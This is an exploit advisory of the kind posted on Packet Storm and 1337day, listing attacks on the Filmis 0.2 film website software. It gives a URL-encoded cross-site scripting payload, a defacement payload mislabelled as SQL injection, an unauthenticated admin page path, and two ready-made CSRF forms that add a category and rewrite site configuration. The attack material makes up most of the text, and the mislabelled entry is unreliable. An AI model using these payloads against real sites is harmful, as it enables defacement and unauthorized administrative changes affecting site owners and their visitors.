Filmis version 0.2 suffers from cross site request forgery and cross site scripting vulnerabilities.
8b210a5c19e2f2ecfeb38873657519516d2e8337db4f6e5866e719b7d761b20a=========================================
Filmis - Version 0.2 Mullti Vulnerability
=========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0 . .--. .--. .---. . 1
1 .'| ) ) / | 0
0 | --: --: / .-.| .-. . . 1
1 | ) ) / ( |( ) | | 0
0 '---' `--' `--' ' `-'`-`-'`-`--| 1
1 ; 0
0 Site : 1337day.com `-' 1
1 Support e-mail : submit[at]inj3ct0r.com 0
0 >> Exploit database separated by exploit 1
1 type (local, remote, DoS, etc.) 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1
#######################################################
# Vendor: http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip
# Date: 2011-07-27
# Author : indoushka
+++=[ Dz Offenders Cr3w ]=+++
# KedAns-Dz * Caddy-Dz * Kalashinkov3
# Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz
# Contact : ind0ushka@hotmail.com
# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
########################################################################
# Exploit By indoushka
-------------
XSS :
http://localhost/filmis/index.php?nb=1%3cScRiPt%20%3eprompt%28972579%29%3c%2fScRiPt%3e
Sql :
http://localhost/filmis/index.php?nb=%3Cmarquee%3E%3Ch1%3EHacked%3C/h1%3E%3C/marquee%3E
by Pass :
http://localhost/filmis/admin/header.php
CSRF Add categorie:
<div id="content">
<h1>Ajouter une catégorie</h1>
<form action="http://localhost/filmis/admin/ajouter-categorie.php" method="post">
<fieldset>
<label for="one">Nom de la catégorie</label>
<input type="text" value="" class="small" id="one" name="nom" />
<span>Taper le nom d'une catégorie à ajouter</span>
<input type="submit" value="Valider" class="submit" />
</fieldset>
</form>
<br class="clear" />
<div class="break"></div>
</div>
===========================
CSRF Add configuration:
<form action="http://localhost/filmis/admin/configuration.php" method="post">
<fieldset>
<label for="titre_site">Nom du site</label>
<input type="text" value="<?php echo desecure($param->info('titre_site')); ?>" class="small" id="titre_site" name="titre_site" />
<label for="url_site">URL du site</label>
<input type="text" value="<?php echo desecure($param->info('url_site')); ?>" class="small" id="url_site" name="url_site" />
<span>URL où est installer Filmis dans votre site. Sans oublier le <i>http://</i> et le <i>/</i> à la fin.</span>
<label for="description_site">Description du site</label>
<textarea class="large" id="description_site" name="description_site" rows="10"><?php echo desecure($param->info('description_site')); ?></textarea>
<span>Description de votre site afficher dans la page "A propos" et dans la balise META.</span>
<label for="apropos">A propos</label>
<textarea class="large" id="apropos" name="apropos" rows="10"><?php echo desecure($param->info('apropos')); ?></textarea>
<span>Personnalisez la page "A propos" en ajoutant un texte.</span>
<input type="submit" value="Valider" class="submit" />
</fieldset>
</form>
<br class="clear" />
<div class="break"></div>
</div>
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed